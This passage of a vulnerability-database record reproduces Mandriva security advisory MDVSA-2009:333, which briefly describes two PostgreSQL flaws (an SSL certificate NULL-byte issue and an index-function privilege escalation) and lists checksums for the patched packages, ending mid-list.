http://ports.ubuntu.com/pool/universe/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0ubuntu9.04_sparc.deb\r\n Size/MD5: 258778 e94884be8ebfce5ad40565f248b910fb\r\n\r\n", "edition": 1, "modified": "2009-09-22T00:00:00", "published": "2009-09-22T00:00:00", "id": "SECURITYVULNS:DOC:22490", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22490", "title": "[USN-834-1] PostgreSQL vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2007-6600", "CVE-2009-3230", "CVE-2009-4034", "CVE-2009-4136"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:333\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : postgresql\r\n Date : December 15, 2009\r\n Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 3.0, Corporate 4.0,\r\n Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities was discovered and corrected in postgresql:\r\n \r\n NULL Bytes in SSL Certificates can be used to falsify client or server\r\n authentication. This only affects users who have SSL enabled, perform\r\n certificate name validation or client certificate authentication,\r\n and where the Certificate Authority &#40;CA&#41; has been tricked into\r\n issuing invalid certificates. The use of a CA that can be trusted to\r\n always issue valid certificates is recommended to ensure you are not\r\n vulnerable to this issue &#40;CVE-2009-4034&#41;.\r\n \r\n Privilege escalation via changing session state in an index\r\n function. This closes a corner case related to vulnerabilities\r\n CVE-2009-3230 and CVE-2007-6600 &#40;CVE-2009-4136&#41;.\r\n \r\n Packages for 2008.0 are being provided due to extended support for\r\n Corporate products.\r\n \r\n This update provides a solution to these vulnerabilities.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4034\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4136\r\n http://www.postgresql.org/support/security\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2008.0:\r\n 7a4134b7ab1675be4c53ff6b4922d7e0 2008.0/i586/libecpg5-8.2.15-0.1mdv2008.0.i586.rpm\r\n b8fe1351d19899fbca1a67929b0b4be7 2008.0/i586/libecpg-devel-8.2.15-0.1mdv2008.0.i586.rpm\r\n e86a98de348ba90bc6a1f16f02daa6e1 2008.0/i586/libpq5-8.2.15-0.1mdv2008.0.i586.rpm\r\n 551363cff118bee0b87dd827dddce669 2008.0/i586/libpq-devel-8.2.15-0.1mdv2008.0.i586.rpm\r\n ef3c1b9a831fedf1399f8b72cd65f748 2008.0/i586/postgresql-8.2.15-0.1mdv2008.0.i586.rpm\r\n d308631e61cd6236e40827b78c9c2951 2008.0/i586/postgresql8.2-8.2.15-0.1mdv2008.0.i586.rpm\r\n f8e97d697f69e43dc4bb2a96e64600cd 2008.0/i586/postgresql8.2-contrib-8.2.15-0.1mdv2008.0.i586.rpm\r\n 863015525b015c812f963a2af63fc7dd 2008.0/i586/postgresql8.2-devel-8.2.15-0.1mdv2008.0.i586.rpm\r\n 6340e0530e254732d654d8f6211d5198 2008.0/i586/postgresql8.2-docs-8.2.15-0.1mdv2008.0.i586.rpm\r\n e098dee5477edb0b7549b65ddb440cb5 2008.0/i586/postgresql8.2-pl-8.2.15-0.1mdv2008.0.i586.rpm\r\n 05cda82443737a12c7c8c3622e762618 2008.0/i586/postgresql8.2-plperl-8.2.15-0.1mdv2008.0.i586.rpm\r\n 6a66bc2cc80538a4db3e44ca97740a7f 2008.0/i586/postgresql8.2-plpgsql-8.2.15-0.1mdv2008.0.i586.rpm\r\n d01866d6fa8d18865e8f47744d0053bd 2008.0/i586/postgresql8.2-plpython-8.2.15-0.1mdv2008.0.i586.rpm\r\n 0e250c776673c8595ed4f57194ceff15 2008.0/i586/postgresql8.2-pltcl-8.2.15-0.1mdv2008.0.i586.rpm\r\n f69196c2af80f25abaae6cdb5273a985 2008.0/i586/postgresql8.2-server-8.2.15-0.1mdv2008.0.i586.rpm\r\n 5c96b2bdfdb5f4b23280de184d76bb4c 2008.0/i586/postgresql8.2-test-8.2.15-0.1mdv2008.0.i586.rpm\r\n 6c203c33bef69b8f676d1acd782d3526 2008.0/i586/postgresql-devel-8.2.15-0.1mdv2008.0.i586.rpm \r\n 37b86e7869ce8ef7621eb5f2fbeb9804 2008.0/SRPMS/postgresql8.2-8.2.15-0.1mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2008.0/X86_64:\r\n ef654ee6768a32df7021cb7c1b95151d 2008.0/x86_64/lib64ecpg5-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 4272c2616fce89a650e102effb3e2427 2008.0/x86_64/lib64ecpg-devel-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n a45cc8104b4758913384375c6f9d993b 2008.0/x86_64/lib64pq5-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n a5beab729e5e4c04374f44b8ed0e7c0d 2008.0/x86_64/lib64pq-devel-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n bc9a43e16b3fe38c26011f76e6e796ea 2008.0/x86_64/postgresql-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 632cc2bd4f2d099de6f18cc5a4ed28b9 2008.0/x86_64/postgresql8.2-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n da76130aeaec4d962904ed0c2c566c63 2008.0/x86_64/postgresql8.2-contrib-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 9061e32e63cc8dfc68a393dc986b6b92 2008.0/x86_64/postgresql8.2-devel-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 2d88f5b268d6661771fd76eccbca7f82 2008.0/x86_64/postgresql8.2-docs-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 46a1f1beb87d1a3618470b5a1427b53d 2008.0/x86_64/postgresql8.2-pl-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n a8126282c514a3b22736c6bf2d3ca570 2008.0/x86_64/postgresql8.2-plperl-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 5aada115ff9cd3c44cd9032d88bd93c4 2008.0/x86_64/postgresql8.2-plpgsql-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 4c9433b70a16300a304ee04b3aeb7abe 2008.0/x86_64/postgresql8.2-plpython-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n cf01e27ebed1d7541c7dfe9fe7eaec20 2008.0/x86_64/postgresql8.2-pltcl-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 16fe157d591066b6c7bd12ef79c78972 2008.0/x86_64/postgresql8.2-server-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n c5b58224e6becb9334cd555747fd040e 2008.0/x86_64/postgresql8.2-test-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 0e826718d8fe8571618ffdff6304b9d9 2008.0/x86_64/postgresql-devel-8.2.15-0.1mdv2008.0.x86_64.rpm \r\n 37b86e7869ce8ef7621eb5f2fbeb9804 2008.0/SRPMS/postgresql8.2-8.2.15-0.1mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2009.0:\r\n eb4c7ac210259c34ce96873fa11cdd7b 2009.0/i586/libecpg8.3_6-8.3.9-0.1mdv2009.0.i586.rpm\r\n ea79f082d51e575072e22e3f37705e76 2009.0/i586/libpq8.3_5-8.3.9-0.1mdv2009.0.i586.rpm\r\n 21dda67f89a7291aa530bdc0b04b3893 2009.0/i586/postgresql8.3-8.3.9-0.1mdv2009.0.i586.rpm\r\n 09d1a7d4bcad3b754772e03bfdd85768 2009.0/i586/postgresql8.3-contrib-8.3.9-0.1mdv2009.0.i586.rpm\r\n ec004d65e57abb94a1c40ebd0e8b0a24 2009.0/i586/postgresql8.3-devel-8.3.9-0.1mdv2009.0.i586.rpm\r\n cae8230c899fd71fd28fc3baaa983e95 2009.0/i586/postgresql8.3-docs-8.3.9-0.1mdv2009.0.i586.rpm\r\n e9a46436f40e44e2b4757b6ee2db2dc3 2009.0/i586/postgresql8.3-pl-8.3.9-0.1mdv2009.0.i586.rpm\r\n edc0dcc12a27a2166f8e14f147f8540d 2009.0/i586/postgresql8.3-plperl-8.3.9-0.1mdv2009.0.i586.rpm\r\n 1c8b6afc908d4e0037085b2b275b0893 2009.0/i586/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.0.i586.rpm\r\n f0a4b90047b26f6de9c0c5475ede00e8 2009.0/i586/postgresql8.3-plpython-8.3.9-0.1mdv2009.0.i586.rpm\r\n 1bbd1b65ed0b65a62963eaccb8008666 2009.0/i586/postgresql8.3-pltcl-8.3.9-0.1mdv2009.0.i586.rpm\r\n 27124329934314f3f73571e83e5fdaf3 2009.0/i586/postgresql8.3-server-8.3.9-0.1mdv2009.0.i586.rpm \r\n 9af04397316050caeeb767c2e53db8da 2009.0/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 6aa7262c7041f8fb039a8031965a6a71 2009.0/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 61af7c606839a7fff0ff56991dfd7021 2009.0/x86_64/lib64pq8.3_5-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 2ff4745b162e6b4234862b1b2fcd315f 2009.0/x86_64/postgresql8.3-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 50d9eaffaf04beea769d22e058a1f2a8 2009.0/x86_64/postgresql8.3-contrib-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n d9fe796fce569179e8e99ae74a63af76 2009.0/x86_64/postgresql8.3-devel-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 980a800e9ac2a0890d24ae0e843fd6e0 2009.0/x86_64/postgresql8.3-docs-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 27334694d9da6e19904c8198d7f6ef43 2009.0/x86_64/postgresql8.3-pl-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 68f2566b2de77da452d4b8043cf8a0de 2009.0/x86_64/postgresql8.3-plperl-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 31c3643e58947d76207345d8e82a6483 2009.0/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 8e342cf436ed4bd6ea61244bca980054 2009.0/x86_64/postgresql8.3-plpython-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 30ba385a932cf752cfd85dd3a0833c40 2009.0/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n e1253c9933f47db51ecd7edc825a703e 2009.0/x86_64/postgresql8.3-server-8.3.9-0.1mdv2009.0.x86_64.rpm \r\n 9af04397316050caeeb767c2e53db8da 2009.0/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n 91a80a39b17253f9321f325979afff81 2009.1/i586/libecpg8.3_6-8.3.9-0.1mdv2009.1.i586.rpm\r\n 7b27f7064a9b75d50d54e3d782ccea54 2009.1/i586/libpq8.3_5-8.3.9-0.1mdv2009.1.i586.rpm\r\n 62da0a6d0030c98fd608a33fb123456c 2009.1/i586/postgresql8.3-8.3.9-0.1mdv2009.1.i586.rpm\r\n 7c7dede7142fd2e3ed2ebdb3c519b623 2009.1/i586/postgresql8.3-contrib-8.3.9-0.1mdv2009.1.i586.rpm\r\n 345e475a35916f7416d4f8b0bf75436b 2009.1/i586/postgresql8.3-devel-8.3.9-0.1mdv2009.1.i586.rpm\r\n 97a70a0872a839f83a2739eaed6607a9 2009.1/i586/postgresql8.3-docs-8.3.9-0.1mdv2009.1.i586.rpm\r\n 0eed7e9ebefdddcaf27e42d33629dabf 2009.1/i586/postgresql8.3-pl-8.3.9-0.1mdv2009.1.i586.rpm\r\n 61952d53ebee9a18a5cf9a10988c4fa3 2009.1/i586/postgresql8.3-plperl-8.3.9-0.1mdv2009.1.i586.rpm\r\n 9cdd01198d4d25ef569cc081c411c050 2009.1/i586/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.1.i586.rpm\r\n 7b9ba830df3a61827eab05cfada3f09b 2009.1/i586/postgresql8.3-plpython-8.3.9-0.1mdv2009.1.i586.rpm\r\n 42fb3e9486162d383bc67d24eb613b1f 2009.1/i586/postgresql8.3-pltcl-8.3.9-0.1mdv2009.1.i586.rpm\r\n db31dcac659eed1a48ee714125c61e78 2009.1/i586/postgresql8.3-server-8.3.9-0.1mdv2009.1.i586.rpm \r\n be8198d19ff2854fcdb5bde0e1654fbf 2009.1/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n c803bc340e21af79f5745df0fee8aead 2009.1/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 616b2b6f79a848fe57410af986c81bda 2009.1/x86_64/lib64pq8.3_5-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 877e5894da539e59805469d16dfda370 2009.1/x86_64/postgresql8.3-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n be3ece7cf5ae31d25dc365389b4e8334 2009.1/x86_64/postgresql8.3-contrib-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n c58f7bf0768b22f5ff229c5cfd4c5f52 2009.1/x86_64/postgresql8.3-devel-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n f3252fd034dcf0a47552b78439fccd4a 2009.1/x86_64/postgresql8.3-docs-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 1b425723f71982812ebf429188cb88da 2009.1/x86_64/postgresql8.3-pl-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 5b463c7748dcc5fae7b1e7443ee75694 2009.1/x86_64/postgresql8.3-plperl-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 70d521df18f5fbfffe7073b95a614ff8 2009.1/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 33a607815a4da55a66101fd13062477e 2009.1/x86_64/postgresql8.3-plpython-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 508aae591f0f59aecde2f4212416a45c 2009.1/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 8b8f650803166b84ba3a3ff4c538ab89 2009.1/x86_64/postgresql8.3-server-8.3.9-0.1mdv2009.1.x86_64.rpm \r\n be8198d19ff2854fcdb5bde0e1654fbf 2009.1/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2010.0:\r\n 1869824366c51ebb0b55055426bd2c53 2010.0/i586/libecpg8.4_6-8.4.2-0.1mdv2010.0.i586.rpm\r\n 2bb29a6b0aaa2d556b6c9d5b86a6fac2 2010.0/i586/libpq8.4_5-8.4.2-0.1mdv2010.0.i586.rpm\r\n 234ea96d6f15028e48fb4d67ba8e3dc0 2010.0/i586/postgresql8.4-8.4.2-0.1mdv2010.0.i586.rpm\r\n c044f451d83daa297d1b6bea592c5759 2010.0/i586/postgresql8.4-contrib-8.4.2-0.1mdv2010.0.i586.rpm\r\n 33167e61bf2e5f8132e581306fb3f9b3 2010.0/i586/postgresql8.4-devel-8.4.2-0.1mdv2010.0.i586.rpm\r\n 52c063f6a31ef49b87fe70227e1cc7a1 2010.0/i586/postgresql8.4-docs-8.4.2-0.1mdv2010.0.i586.rpm\r\n dc75e2ebbab59312d6c1a491b6393f91 2010.0/i586/postgresql8.4-pl-8.4.2-0.1mdv2010.0.i586.rpm\r\n a44bac65b39698446f4d066f77cd3085 2010.0/i586/postgresql8.4-plperl-8.4.2-0.1mdv2010.0.i586.rpm\r\n 9537965ff95b6d6c62be3df17567f6c9 2010.0/i586/postgresql8.4-plpgsql-8.4.2-0.1mdv2010.0.i586.rpm\r\n 32b66a3d2d191bf52ad1770ce92a24bd 2010.0/i586/postgresql8.4-plpython-8.4.2-0.1mdv2010.0.i586.rpm\r\n a45380a8bc2072792ab52042db3a837c 2010.0/i586/postgresql8.4-pltcl-8.4.2-0.1mdv2010.0.i586.rpm\r\n b99ffb5c3cbb7266b63986b075b0eb95 2010.0/i586/postgresql8.4-server-8.4.2-0.1mdv2010.0.i586.rpm \r\n 7b23c6c695cbf9cf78d105f6bf7fc80f 2010.0/SRPMS/postgresql8.4-8.4.2-0.1mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n 864f7b0ab419b1c08fdbff5af593a9e3 2010.0/x86_64/lib64ecpg8.4_6-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 707a9ed081a46bea0cec38bd2bfe3561 2010.0/x86_64/lib64pq8.4_5-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n e3aa48ed1d6da44aaf791be57619043d 2010.0/x86_64/postgresql8.4-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 874e5a9ab5757e0d9c509eee102c0dc2 2010.0/x86_64/postgresql8.4-contrib-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 90627e1bdc5988d3a78ee16491a27148 2010.0/x86_64/postgresql8.4-devel-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n cf905e15179fe18fa68ae02f35713139 2010.0/x86_64/postgresql8.4-docs-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 8e6957a4ca67801131ee70dbe4f3639a 2010.0/x86_64/postgresql8.4-pl-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 1b1e5de5c77a30672ea9bba9d49d7bed 2010.0/x86_64/postgresql8.4-plperl-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n b87c3d4cd820d21eac3e66559d773508 2010.0/x86_64/postgresql8.4-plpgsql-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n cfcaf767fb6135169e3fb01704e2831e 2010.0/x86_64/postgresql8.4-plpython-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n fd216fa6f5ecb1fa1d8f6429396b4142 2010.0/x86_64/postgresql8.4-pltcl-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 9c86fd1c896343e5c48b76aed566f8c8 2010.0/x86_64/postgresql8.4-server-8.4.2-0.1mdv2010.0.x86_64.rpm \r\n 7b23c6c695cbf9cf78d105f6bf7fc80f 2010.0/SRPMS/postgresql8.4-8.4.2-0.1mdv2010.0.src.rpm\r\n\r\n Corporate 3.0:\r\n 8a71295ef109fe3ab7260170384c0ce7 corporate/3.0/i586/libecpg3-7.4.27-0.1.C30mdk.i586.rpm\r\n 11ef4350d665b4b2ef2fd926bd560aa8 corporate/3.0/i586/libecpg3-devel-7.4.27-0.1.C30mdk.i586.rpm\r\n 30c8a894b12b223ad491abd4547c1fd7 corporate/3.0/i586/libpgtcl2-7.4.27-0.1.C30mdk.i586.rpm\r\n 0fa521cc9af217d927ca79c91b0c9eae corporate/3.0/i586/libpgtcl2-devel-7.4.27-0.1.C30mdk.i586.rpm\r\n 3672fefda6db5e828c7d939a27314b38 corporate/3.0/i586/libpq3-7.4.27-0.1.C30mdk.i586.rpm\r\n 9a2ba43d5dc9593ca1bbab4647208080 corporate/3.0/i586/libpq3-devel-7.4.27-0.1.C30mdk.i586.rpm\r\n 2247db07ed8b627fbfc35ac648c2a5df corporate/3.0/i586/postgresql-7.4.27-0.1.C30mdk.i586.rpm\r\n e616a70f043ff0b0482e87d56a1019cd corporate/3.0/i586/postgresql-contrib-7.4.27-0.1.C30mdk.i586.rpm\r\n 08f9f7e7f8fb429cf0c77cfa7eda23d3 corporate/3.0/i586/postgresql-devel-7.4.27-0.1.C30mdk.i586.rpm\r\n 6d3b0ed2ba2b362ac09db9c4ae07b9e2 corporate/3.0/i586/postgresql-docs-7.4.27-0.1.C30mdk.i586.rpm\r\n 69b5e9674499b805b8e27bb6c348feec corporate/3.0/i586/postgresql-jdbc-7.4.27-0.1.C30mdk.i586.rpm\r\n 392426960dd9831613903d460af31b80 corporate/3.0/i586/postgresql-pl-7.4.27-0.1.C30mdk.i586.rpm\r\n c266e60a60a5c438dddd9fc3a9e86415 corporate/3.0/i586/postgresql-server-7.4.27-0.1.C30mdk.i586.rpm\r\n 7195e1843ccacf58dd3a8e6888f52687 corporate/3.0/i586/postgresql-tcl-7.4.27-0.1.C30mdk.i586.rpm\r\n d5a7dacb4bbb6d35d0eac00f8fb3fe8f corporate/3.0/i586/postgresql-test-7.4.27-0.1.C30mdk.i586.rpm \r\n 72f69a2d5c5b94cae7b2e9c38c193125 corporate/3.0/SRPMS/postgresql-7.4.27-0.1.C30mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n ca3ea7496d9340c6bc7466e478a821ff corporate/3.0/x86_64/lib64ecpg3-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 0ede7c61f0595bff37777971a2e2d3ac corporate/3.0/x86_64/lib64ecpg3-devel-7.4.27-0.1.C30mdk.x86_64.rpm\r\n a798bef9e8f689aed42f1317f59fb189 corporate/3.0/x86_64/lib64pgtcl2-7.4.27-0.1.C30mdk.x86_64.rpm\r\n c5fbbf4818f054ad11be80dad96c2e2f corporate/3.0/x86_64/lib64pgtcl2-devel-7.4.27-0.1.C30mdk.x86_64.rpm\r\n e89bb5fa7f482af3779d4508ccdc0f90 corporate/3.0/x86_64/lib64pq3-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 43966e84c38f69cf644e05f86bb157b9 corporate/3.0/x86_64/lib64pq3-devel-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 7821bd199a8e957f862d2e6751f9993b corporate/3.0/x86_64/postgresql-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 3b7c354b1438fbf7e5613ec4b9525144 corporate/3.0/x86_64/postgresql-contrib-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 1271e5de07e40e7ef5d0b39ad4593cd8 corporate/3.0/x86_64/postgresql-devel-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 17a2e21ba705128bc6dc234fa9222269 corporate/3.0/x86_64/postgresql-docs-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 284c5e6b3bc707509767df7ec5940915 corporate/3.0/x86_64/postgresql-jdbc-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 0b3d675d0991c98ea6b2a665eb587c29 corporate/3.0/x86_64/postgresql-pl-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 742086f186cd02ce6e010aa5b0efcde4 corporate/3.0/x86_64/postgresql-server-7.4.27-0.1.C30mdk.x86_64.rpm\r\n d5875f42122d0a021b1ae474a3c71de4 corporate/3.0/x86_64/postgresql-tcl-7.4.27-0.1.C30mdk.x86_64.rpm\r\n e4eeed326ce8f6a6cd14d955c9af1c3b corporate/3.0/x86_64/postgresql-test-7.4.27-0.1.C30mdk.x86_64.rpm \r\n 72f69a2d5c5b94cae7b2e9c38c193125 corporate/3.0/SRPMS/postgresql-7.4.27-0.1.C30mdk.src.rpm\r\n\r\n Corporate 4.0:\r\n f16a9d7c219db91a48f05d47fbb25328 corporate/4.0/i586/libecpg5-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 46e5cba337eb64ebd722f1cf20a1bea0 corporate/4.0/i586/libecpg5-devel-8.1.19-0.1.20060mlcs4.i586.rpm\r\n aa1bf8fa60ba634f847ef99743b54509 corporate/4.0/i586/libpq4-8.1.19-0.1.20060mlcs4.i586.rpm\r\n c9b495e705a47e8c657fe486c6a73caa corporate/4.0/i586/libpq4-devel-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 8576e546f41ec07302b09f22b800c2a3 corporate/4.0/i586/postgresql-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 99c18cea6a827b10c4197dea71660714 corporate/4.0/i586/postgresql-contrib-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 7a4ac00898e262a29c945ea24381a02c corporate/4.0/i586/postgresql-devel-8.1.19-0.1.20060mlcs4.i586.rpm\r\n e10dde94402ce28c56d0a59f449b2120 corporate/4.0/i586/postgresql-docs-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 2b0aaa02c58d5f75be11b93663ac2db2 corporate/4.0/i586/postgresql-pl-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 898ffb6afa67a42abd8cbd415f20f12d corporate/4.0/i586/postgresql-plperl-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 750c34d0bd6c1370a10f65b0fe0d042f corporate/4.0/i586/postgresql-plpgsql-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 0e2fae96fe4ae65e119ec57bc62d1c18 corporate/4.0/i586/postgresql-plpython-8.1.19-0.1.20060mlcs4.i586.rpm\r\n ddfb7d5dcb55d11ca58c59072c96ffd8 corporate/4.0/i586/postgresql-pltcl-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 0ff2a52751ddf2c15ab718e378864209 corporate/4.0/i586/postgresql-server-8.1.19-0.1.20060mlcs4.i586.rpm\r\n dbd24a627e161243ace369ed2bd0cb59 corporate/4.0/i586/postgresql-test-8.1.19-0.1.20060mlcs4.i586.rpm \r\n cd1d017d500f3616eb652ad819dcc8eb corporate/4.0/SRPMS/postgresql-8.1.19-0.1.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n ff727efb618417699e1d702c463c08ff corporate/4.0/x86_64/lib64ecpg5-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n d9d0a5ed50a5ea130ec32fe942f58c90 corporate/4.0/x86_64/lib64ecpg5-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 64c1ae194c06762d74dc69105a16a6d3 corporate/4.0/x86_64/lib64pq4-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 5ff5e5660fa8e69fdabc2ec56fb41f33 corporate/4.0/x86_64/lib64pq4-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n d92641b17c40ac1237651577a716d716 corporate/4.0/x86_64/postgresql-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n c1a90670f7443af7ae03ddd89fe8ff86 corporate/4.0/x86_64/postgresql-contrib-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 81907fd64a64793480a155ce04b7c8c1 corporate/4.0/x86_64/postgresql-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n a1b78b2902098f4e2981deb47c14705f corporate/4.0/x86_64/postgresql-docs-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n e3ed9cee0ba6f35ba20bcc593059dfc9 corporate/4.0/x86_64/postgresql-pl-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n a4302fcb3ff0a03be6eadc2fa87e7772 corporate/4.0/x86_64/postgresql-plperl-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 81df2078a490b8f7944e14947172a3cb corporate/4.0/x86_64/postgresql-plpgsql-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 33e8b703accdaf358014a4f4b9f20edf corporate/4.0/x86_64/postgresql-plpython-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n a7d0b24be375bf699a16d856872ed3b0 corporate/4.0/x86_64/postgresql-pltcl-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 124bb9309c4bcb6174703c933e81fdf8 corporate/4.0/x86_64/postgresql-server-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n a63ab9b6d993eb50e5b437592423dfe7 corporate/4.0/x86_64/postgresql-test-8.1.19-0.1.20060mlcs4.x86_64.rpm \r\n cd1d017d500f3616eb652ad819dcc8eb corporate/4.0/SRPMS/postgresql-8.1.19-0.1.20060mlcs4.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 7954b4d7b6b3ad3a4dc075a63503e1d0 mes5/i586/libecpg8.3_6-8.3.9-0.1mdvmes5.i586.rpm\r\n 1631a58bfb19765fa166f6e507e9799b mes5/i586/libpq8.3_5-8.3.9-0.1mdvmes5.i586.rpm\r\n 643f5cada4cb4dbf53e7931a88be3f33 mes5/i586/postgresql8.3-8.3.9-0.1mdvmes5.i586.rpm\r\n c14326f783c2a1f5b90ea623e00e95bf mes5/i586/postgresql8.3-contrib-8.3.9-0.1mdvmes5.i586.rpm\r\n 4e1c3db6f801090ab60b31028fbfaa18 mes5/i586/postgresql8.3-devel-8.3.9-0.1mdvmes5.i586.rpm\r\n c36fcbf4195dbf7becd7c3dabf81e20b mes5/i586/postgresql8.3-docs-8.3.9-0.1mdvmes5.i586.rpm\r\n 524d653e230fbac674e9ce464d290b89 mes5/i586/postgresql8.3-pl-8.3.9-0.1mdvmes5.i586.rpm\r\n 9877115225ad4463430d7e0bf6debebd mes5/i586/postgresql8.3-plperl-8.3.9-0.1mdvmes5.i586.rpm\r\n 9bf0e1591576271129b01f4f0bd60b9e mes5/i586/postgresql8.3-plpgsql-8.3.9-0.1mdvmes5.i586.rpm\r\n b64538f411412f4025471fcad1ce24c8 mes5/i586/postgresql8.3-plpython-8.3.9-0.1mdvmes5.i586.rpm\r\n 3f9499776b4395c5829c761daa952976 mes5/i586/postgresql8.3-pltcl-8.3.9-0.1mdvmes5.i586.rpm\r\n 2f8625a2f70355715b426be163316c8c mes5/i586/postgresql8.3-server-8.3.9-0.1mdvmes5.i586.rpm \r\n a71b64c6243bc5302fd20a09b6f209a7 mes5/SRPMS/postgresql8.3-8.3.9-0.1mdvmes5.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n af91e508191f984255fcca2cc4847dd5 